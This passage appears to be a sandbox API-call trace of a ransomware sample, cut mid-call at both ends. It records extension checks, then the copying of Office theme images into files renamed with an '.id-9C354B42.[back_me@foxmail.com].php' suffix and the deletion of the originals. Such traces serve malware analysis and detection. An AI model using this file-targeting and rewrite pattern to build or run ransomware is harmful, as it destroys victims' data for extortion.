Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.708] lstrlenW (lpString=".doc") returned 4 [0045.708] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0045.708] lstrlenW (lpString=".docx") returned 5 [0045.708] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0045.708] lstrlenW (lpString=".pdf") returned 4 [0045.708] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0045.708] lstrlenW (lpString=".xls") returned 4 [0045.708] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0045.708] lstrlenW (lpString=".xlsx") returned 5 [0045.708] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0045.708] lstrlenW (lpString=".ppt") returned 4 [0045.708] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0045.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString=".zip") returned 4 [0045.709] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0045.709] lstrlenW (lpString=".rar") returned 4 [0045.709] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0045.709] lstrlenW (lpString=".bz2") returned 4 [0045.709] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0045.709] lstrlenW (lpString=".7z") returned 3 [0045.709] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString=".dbf") returned 4 [0045.709] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString=".1cd") returned 4 [0045.709] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString=".jpg") returned 4 [0045.709] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString=".doc") returned 4 [0045.709] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0045.709] lstrlenW (lpString=".docx") returned 5 [0045.709] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0045.709] lstrlenW (lpString=".pdf") returned 4 [0045.709] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0045.709] lstrlenW (lpString=".xls") returned 4 [0045.709] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0045.709] lstrlenW (lpString=".xlsx") returned 5 [0045.709] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0045.709] lstrlenW (lpString=".ppt") returned 4 [0045.709] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0045.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.709] lstrlenW (lpString=".zip") returned 4 [0045.709] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0045.710] lstrlenW (lpString=".rar") returned 4 [0045.710] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0045.710] lstrlenW (lpString=".bz2") returned 4 [0045.710] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0045.710] lstrlenW (lpString=".7z") returned 3 [0045.710] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.710] lstrlenW (lpString=".dbf") returned 4 [0045.710] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.710] lstrlenW (lpString=".1cd") returned 4 [0045.710] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0045.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.710] lstrlenW (lpString=".jpg") returned 4 [0045.710] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0045.710] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0045.710] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0045.711] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=2848) returned 1 [0045.711] CloseHandle (hObject=0x1b0) returned 1 [0045.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 0x20 [0045.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0045.711] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.711] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.711] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.345] GetLastError () returned 0x0 [0046.345] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xb20, lpOverlapped=0x0) returned 1 [0046.346] WriteFile (in: hFile=0x184, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xb30, lpOverlapped=0x0) returned 1 [0046.347] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.347] WriteFile (in: hFile=0x184, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.347] SetEndOfFile (hFile=0x184) returned 1 [0046.347] CloseHandle (hObject=0x184) returned 1 [0046.348] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.348] SetEndOfFile (hFile=0x1b0) returned 1 [0046.348] CloseHandle (hObject=0x1b0) returned 1 [0046.348] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.349] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\preview.gif")) returned 1 [0046.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.349] lstrlenW (lpString=".doc") returned 4 [0046.349] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.349] lstrlenW (lpString=".docx") returned 5 [0046.349] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.349] lstrlenW (lpString=".pdf") returned 4 [0046.349] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.349] lstrlenW (lpString=".xls") returned 4 [0046.349] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.349] lstrlenW (lpString=".xlsx") returned 5 [0046.349] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.349] lstrlenW (lpString=".ppt") returned 4 [0046.349] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.349] lstrlenW (lpString=".zip") returned 4 [0046.349] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.349] lstrlenW (lpString=".rar") returned 4 [0046.349] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.349] lstrlenW (lpString=".bz2") returned 4 [0046.350] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.350] lstrlenW (lpString=".7z") returned 3 [0046.350] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.350] lstrlenW (lpString=".dbf") returned 4 [0046.350] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.350] lstrlenW (lpString=".1cd") returned 4 [0046.350] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.350] lstrlenW (lpString=".jpg") returned 4 [0046.350] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.350] lstrlenW (lpString=".doc") returned 4 [0046.350] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.350] lstrlenW (lpString=".docx") returned 5 [0046.350] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.350] lstrlenW (lpString=".pdf") returned 4 [0046.350] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.350] lstrlenW (lpString=".xls") returned 4 [0046.350] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.350] lstrlenW (lpString=".xlsx") returned 5 [0046.350] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.350] lstrlenW (lpString=".ppt") returned 4 [0046.350] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.350] lstrlenW (lpString=".zip") returned 4 [0046.350] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.350] lstrlenW (lpString=".rar") returned 4 [0046.350] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.350] lstrlenW (lpString=".bz2") returned 4 [0046.350] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.350] lstrlenW (lpString=".7z") returned 3 [0046.351] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.351] lstrlenW (lpString=".dbf") returned 4 [0046.351] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.351] lstrlenW (lpString=".1cd") returned 4 [0046.351] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\PREVIEW.GIF") returned 72 [0046.351] lstrlenW (lpString=".jpg") returned 4 [0046.351] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.351] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.351] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.351] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1560) returned 1 [0046.351] CloseHandle (hObject=0x1b0) returned 1 [0046.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 0x20 [0046.352] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.352] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.352] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.353] GetLastError () returned 0x0 [0046.353] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x618, lpOverlapped=0x0) returned 1 [0046.355] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x620, lpOverlapped=0x0) returned 1 [0046.356] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.356] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.356] SetEndOfFile (hFile=0x194) returned 1 [0046.356] CloseHandle (hObject=0x194) returned 1 [0046.356] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.356] SetEndOfFile (hFile=0x1b0) returned 1 [0046.357] CloseHandle (hObject=0x1b0) returned 1 [0046.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.357] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif")) returned 1 [0046.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.358] lstrlenW (lpString=".doc") returned 4 [0046.359] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.359] lstrlenW (lpString=".docx") returned 5 [0046.359] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.359] lstrlenW (lpString=".pdf") returned 4 [0046.359] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.359] lstrlenW (lpString=".xls") returned 4 [0046.359] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.359] lstrlenW (lpString=".xlsx") returned 5 [0046.359] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.359] lstrlenW (lpString=".ppt") returned 4 [0046.359] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.359] lstrlenW (lpString=".zip") returned 4 [0046.359] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.359] lstrlenW (lpString=".rar") returned 4 [0046.359] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.359] lstrlenW (lpString=".bz2") returned 4 [0046.359] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.359] lstrlenW (lpString=".7z") returned 3 [0046.359] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.359] lstrlenW (lpString=".dbf") returned 4 [0046.359] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.359] lstrlenW (lpString=".1cd") returned 4 [0046.359] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.359] lstrlenW (lpString=".jpg") returned 4 [0046.359] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.359] lstrlenW (lpString=".doc") returned 4 [0046.359] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.360] lstrlenW (lpString=".docx") returned 5 [0046.360] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.360] lstrlenW (lpString=".pdf") returned 4 [0046.360] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.360] lstrlenW (lpString=".xls") returned 4 [0046.360] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.360] lstrlenW (lpString=".xlsx") returned 5 [0046.360] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.360] lstrlenW (lpString=".ppt") returned 4 [0046.360] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.360] lstrlenW (lpString=".zip") returned 4 [0046.360] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.360] lstrlenW (lpString=".rar") returned 4 [0046.360] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.360] lstrlenW (lpString=".bz2") returned 4 [0046.360] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.360] lstrlenW (lpString=".7z") returned 3 [0046.360] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.360] lstrlenW (lpString=".dbf") returned 4 [0046.360] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.360] lstrlenW (lpString=".1cd") returned 4 [0046.360] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 76 [0046.360] lstrlenW (lpString=".jpg") returned 4 [0046.360] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.360] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.360] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.361] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=33009) returned 1 [0046.361] CloseHandle (hObject=0x1b0) returned 1 [0046.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 0x20 [0046.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.361] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.361] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.362] GetLastError () returned 0x0 [0046.362] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x80f1, lpOverlapped=0x0) returned 1 [0046.363] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x8100, lpOverlapped=0x0) returned 1 [0046.365] ReadFile (in: hFile=0x1b0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.365] WriteFile (in: hFile=0x194, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.365] SetEndOfFile (hFile=0x194) returned 1 [0046.365] CloseHandle (hObject=0x194) returned 1 [0046.366] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.366] SetEndOfFile (hFile=0x1b0) returned 1 [0046.366] CloseHandle (hObject=0x1b0) returned 1 [0046.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.367] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1 [0046.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0046.367] lstrlenW (lpString=".doc") returned 4 [0046.367] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.367] lstrlenW (lpString=".docx") returned 5 [0046.367] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.367] lstrlenW (lpString=".pdf") 